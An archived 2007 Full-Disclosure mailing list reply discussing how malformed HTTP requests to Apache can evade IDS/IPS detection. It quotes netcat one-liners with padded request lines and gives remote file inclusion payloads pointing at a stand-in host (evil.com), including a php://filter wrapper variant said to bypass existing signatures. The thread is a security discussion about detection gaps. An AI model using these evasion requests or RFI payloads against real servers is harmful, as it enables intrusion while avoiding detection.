lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <17b0fcab0706200539k11f700cbga1ce9431aaa4d4a7@mail.gmail.com>
Date: Wed, 20 Jun 2007 13:39:21 +0100
From: "Jamie Riden" <jamie.riden@...il.com>
To: 3APA3A <3APA3A@...urity.nnov.ru>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: IPS Evasion with the Apache HTTP Server

On 20/06/07, 3APA3A <3APA3A@...urity.nnov.ru> wrote:
> Dear H D Moore,
>
> --Tuesday, June 19, 2007, 11:20:41 PM, you wrote to full-disclosure@...ts.grok.org.uk:
>
> HDM> $  echo  -ne "\r\n\r\n\r\n\r\n\r\n /buggy.php HTTP/1.0\r\n\r\n" | \
> HDM> nc webserver 80
>
> According  to  recommendations  of  RFC  2616, section 4.1 Web server or
> proxy  server  should  ignore \r\n before request for compatibility with
> odd  clients  sending  trailing  \r\n  with POST requests via keep-alive
> connections:
>
>    In the interest of robustness, servers SHOULD ignore any empty
>    line(s) received where a Request-Line is expected. In other words, if
>    the server is reading the protocol stream at the beginning of a
>    message and receives a CRLF first, it should ignore the CRLF.
>
> $ echo -ne " /buggy.php HTTP/1.0\r\n\r\n" | nc webserver 80
>
> Does the same job. This problem (unsupported request method) was already
> reported by Michal Majchrowicz, see
>
> http://securityvulns.com/Qdocument846.html

(This is what I gathered from the original posting, but I might be wrong.)

I think the issue is not that the apache server behaviour is wrong as
such, but that IDS/IPS do not use the same algorithm as apache for
checking validity of HTTP requests. Thus apache may accept and process
a request like:

\r\n\r\n\r\n\r\n\r\n\x0c/rfi.php?includedir=http://evil.com\x0bHTTP/1.0\r\n\r\n

but that the IDS/IPS will ignore that packet on the grounds that "it's
not a valid HTTP request"., when it should actually be alerting that a
RFI attempt was made.

While we're on the subject of IDS, it looks like PHP 5 supports a new
wrapper php://filter, such that a RFI may be performed by: GET
/rfi.php?includedir=php://filter/resource=http://www.evil.com - which
may not be detected by some existing IDS signatures. (See
http://uk2.php.net/manual/en/wrappers.php.php )

cheers,
 Jamie
-- 
Jamie Riden / jamesr@...ope.com / jamie@...eynet.org.uk
UK Honeynet Project: http://www.ukhoneynet.org/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ